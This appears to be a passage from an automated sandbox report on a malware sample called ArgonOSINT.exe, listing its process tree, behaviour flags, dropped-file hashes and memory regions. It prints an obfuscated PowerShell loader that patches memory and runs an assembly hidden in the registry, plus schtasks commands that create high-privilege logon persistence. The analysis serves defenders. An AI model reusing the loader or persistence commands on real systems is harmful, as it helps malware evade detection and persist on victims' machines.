yKQXcQErvRYAmWy,$RPiWTTDMJWmixFOhIbarIH).Invoke($BizlGAzxknMzNcWBX,[uint32]8,4,[ref]$zMqDdSYUbf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BizlGAzxknMzNcWBX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RkyKQXcQErvRYAmWy,$RPiWTTDMJWmixFOhIbarIH).Invoke($BizlGAzxknMzNcWBX,[uint32]8,0x20,[ref]$zMqDdSYUbf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe"C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77ArgonOSINT.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\ArgonOSINT.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /72⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exeFilesize
409KB
MD5c4f70954d48c8653fde31fc63c619fc8
SHA1c2fe0bc4eab66f6cbf19ab3a80817eba8084982e
SHA256dbc30b002dad39a45fdd36c509d854dc931662235886f01ec149cd8cf904ddb5
SHA5121a0db425192d25f1e96ac43a5ae18ff530ef11e2f1526fd6677f4b82b04e212679c347f5647be0d72665e2f587c2824b19d2104c48546eb049ae27fb7470defc
-
C:\Windows\Temp\__PSScriptPolicyTest_mr2g4xi2.ryu.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/576-64-0x000001AA0B130000-0x000001AA0B155000-memory.dmpFilesize
148KB
-
memory/576-65-0x000001AA0B160000-0x000001AA0B18B000-memory.dmpFilesize
172KB
-
memory/576-73-0x00007FFA52ED0000-0x00007FFA52EE0000-memory.dmpFilesize
64KB
-
memory/576-72-0x000001AA0B160000-0x000001AA0B18B000-memory.dmpFilesize
172KB
-
memory/576-66-0x000001AA0B160000-0x000001AA0B18B000-memory.dmpFilesize
172KB
-
memory/652-83-0x000002076D0D0000-0x000002076D0FB000-memory.dmpFilesize
172KB
-
memory/652-77-0x000002076D0D0000-0x000002076D0FB000-memory.dmpFilesize
172KB
-
memory/652-84-0x00007FFA52ED0000-0x00007FFA52EE0000-memory.dmpFilesize
64KB
-
memory/736-94-0x00000211D9C30000-0x00000211D9C5B000-memory.dmpFilesize
172KB
-
memory/736-88-0x00000211D9C30000-0x00000211D9C5B000-memory.dmpFilesize
172KB
-
memory/736-95-0x00007FFA52ED0000-0x00007FFA52EE0000-memory.dmpFilesize
64KB
-
memory/928-105-0x000001E62A4A0000-0x000001E62A4CB000-memory.dmpFilesize
172KB
-
memory/928-106-0x00007FFA52ED0000-0x00007FFA52EE0000-memory.dmpFilesize
64KB
-
memory/928-99-0x000001E62A4A0000-0x000001E62A4CB000-memory.dmpFilesize
172KB
-
memory/1004-110-0x00000195A0790000-0x00000195A07BB000-memory.dmpFilesize
172KB
-
memory/2000-752-0x0000000073A10000-0x00000000740FE000-memory.dmpFilesize
6.9MB
-
memory/2000-14-0x0000000073A10000-0x00000000740FE000-memory.dmpFilesize
6.9MB
-
memory/2000-753-0x0000000006900000-0x000000000690A000-memory.dmpFilesize
40KB
-
memory/2000-13-0x0000000073A10000-0x00000000740FE000-memory.dmpFilesize
6.9MB
-
memory/2524-28-0x0000021EEE4D0000-0x0000021EEE546000-memory.dmpFilesize
472KB
-
memory/2524-49-0x00007FFA90490000-0x00007FFA9053E000-memory.dmpFilesize
696KB
-
memory/2524-48-0x00007FFA92E40000-0x00007FFA9301B000-memory.dmpFilesize
1.9MB
-
memory/2524-47-0x0000021EEE650000-0x0000021EEE67A000-memory.dmpFilesize
168KB
-
memory/2524-25-0x0000021EEE320000-0x0000021EEE342000-memory.dmpFilesize
136KB
-
memory/3468-60-0x00007FFA90490000-0x00007FFA9053E000-memory.dmpFilesize
696KB
-
memory/3468-50-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3468-51-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3468-52-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3468-53-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3468-58-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3468-59-0x00007FFA92E40000-0x00007FFA9301B000-memory.dmpFilesize
1.9MB
-
memory/3468-61-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4596-1-0x0000000000A20000-0x0000000000A8C000-memory.dmpFilesize
432KB
-
memory/4596-0-0x0000000073A1E000-0x0000000073A1F000-memory.dmpFilesize
4KB
-
memory/4596-2-0x0000000005770000-0x0000000005C6E000-memory.dmpFilesize
5.0MB
-
memory/4596-19-0x0000000073A10000-0x00000000740FE000-memory.dmpFilesize
6.9MB
-
memory/4596-4-0x0000000073A10000-0x00000000740FE000-memory.dmpFilesize
6.9MB
-
memory/4596-6-0x0000000005750000-0x0000000005762000-memory.dmpFilesize
72KB
-
memory/4596-3-0x0000000005350000-0x00000000053E2000-memory.dmpFilesize
584KB
-
memory/4596-7-0x0000000006340000-0x000000000637E000-memory.dmpFilesize
248KB
-
memory/4596-5-0x00000000053F0000-0x0000000005456000-memory.dmpFilesize
408KB